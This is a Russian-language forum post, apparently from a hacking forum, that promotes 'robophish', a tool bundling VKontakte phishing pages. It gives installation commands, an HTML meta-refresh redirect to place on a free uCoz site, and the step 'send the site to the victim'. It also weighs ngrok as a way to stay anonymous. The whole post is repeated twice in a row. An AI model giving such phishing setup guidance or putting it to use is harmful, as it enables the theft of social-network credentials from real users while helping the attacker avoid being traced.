Привет
Предистория: Где-то год назад у меня возникла потребность в хорошем фишинге для вк. Спустя некоторое время поиска, я все же нашел несколько достойных, но вспомнил о том, что я немного забыл об анонимности. Ведь фишинг надо ставить на хост, а это небольшой удар по конфиденциальности. И тогда-то я задумался, как же пользоваться фишингом, не тратить на хороший хост деньги и оставаться анонимным?
В итоге я нашел утилиту shellphish http://github.com/thelinuxchoice
но ее функционал был нацелен на не очень умных пользователей, которые до сих пор ведутся на обычный сайт с авторизацией. И тогда мне в голову пришла идея написать свою утилиту. Сборник с самыми лучшими фишингами вк. Не буду скрывать, за основу я взял его скрипт, а сайты нашел в открытом доступе. Но первая версия получилась довольно сырая и не работала должным образом. Но спустя почти год, я решил доделать начатое и выпустил вторую версию.
Скачать можно тут
на гит хабе установка не слишком понятная, так что я попробую описать все тут. Для простоты работы требуется Linux. Установка будет для Debian Linux. В других дистрибутивах, команды могут немного отличаться, однако если вы умеете гуглить вы справитесь со всеми ошибками. Установка на Windows - не тестировалась.
УСТАНОВКА:
Bash:
Скопировать в буфер обмена
1. sudo apt-get install git
2. git clone gasayminajj/robophish
3. cd robophish
4. bash robophish.sh
5. Дальше все интуитивно понятно, нажимаем по ссылке(она оч некрасивая, нужно с ней что-то делать)
6.1 Идем на сайт www.ucoz.com и создаем пустой сайт, главное выбрать более менее красивый url.
6.2 Заходим в HTML редатор.
6.3 Добавляем туда скрипт на переадресацию на наш сайт
HTML:
Скопировать в буфер обмена
<head>
<meta http-equiv="refresh" content="1;URL=ссылка" />
</head>
7. Скидываем сайт жертве.
Если у вас на этапе запуска нет ошибок, то дальше сами разберетесь. Если они есть, то это ошибки связанные с отсутствием php.
Надеюсь вы сами сами разберетесь с установкой php, если будут вопросы, дополню статью сведениями об установке. Возможно позже сделаю гайд по установке на Windows(там и самому можно разобраться, используйте Cygwin64(не реклама) )
А еще хочется узнать, не зря ли я все это сделал? Просто мне кажется, гораздо безопаснее использовать ngrok, вся информации о сайте на котором он был поднят, исчезает по нажатию ctrl+c. Если это не так, то поправьте пожайлуста)
Автор @gasayminajj
aka Егор Гасай
Предистория: Где-то год назад у меня возникла потребность в хорошем фишинге для вк. Спустя некоторое время поиска, я все же нашел несколько достойных, но вспомнил о том, что я немного забыл об анонимности. Ведь фишинг надо ставить на хост, а это небольшой удар по конфиденциальности. И тогда-то я задумался, как же пользоваться фишингом, не тратить на хороший хост деньги и оставаться анонимным?
В итоге я нашел утилиту shellphish http://github.com/thelinuxchoice
но ее функционал был нацелен на не очень умных пользователей, которые до сих пор ведутся на обычный сайт с авторизацией. И тогда мне в голову пришла идея написать свою утилиту. Сборник с самыми лучшими фишингами вк. Не буду скрывать, за основу я взял его скрипт, а сайты нашел в открытом доступе. Но первая версия получилась довольно сырая и не работала должным образом. Но спустя почти год, я решил доделать начатое и выпустил вторую версию.
Скачать можно тут
на гит хабе установка не слишком понятная, так что я попробую описать все тут. Для простоты работы требуется Linux. Установка будет для Debian Linux. В других дистрибутивах, команды могут немного отличаться, однако если вы умеете гуглить вы справитесь со всеми ошибками. Установка на Windows - не тестировалась.
УСТАНОВКА:
Bash:
Скопировать в буфер обмена
1. sudo apt-get install git
2. git clone gasayminajj/robophish
3. cd robophish
4. bash robophish.sh
5. Дальше все интуитивно понятно, нажимаем по ссылке(она оч некрасивая, нужно с ней что-то делать)
6.1 Идем на сайт www.ucoz.com и создаем пустой сайт, главное выбрать более менее красивый url.
6.2 Заходим в HTML редатор.
6.3 Добавляем туда скрипт на переадресацию на наш сайт
HTML:
Скопировать в буфер обмена
<head>
<meta http-equiv="refresh" content="1;URL=ссылка" />
</head>
7. Скидываем сайт жертве.
Если у вас на этапе запуска нет ошибок, то дальше сами разберетесь. Если они есть, то это ошибки связанные с отсутствием php.
Надеюсь вы сами сами разберетесь с установкой php, если будут вопросы, дополню статью сведениями об установке. Возможно позже сделаю гайд по установке на Windows(там и самому можно разобраться, используйте Cygwin64(не реклама) )
А еще хочется узнать, не зря ли я все это сделал? Просто мне кажется, гораздо безопаснее использовать ngrok, вся информации о сайте на котором он был поднят, исчезает по нажатию ctrl+c. Если это не так, то поправьте пожайлуста)
Автор @gasayminajj
aka Егор Гасай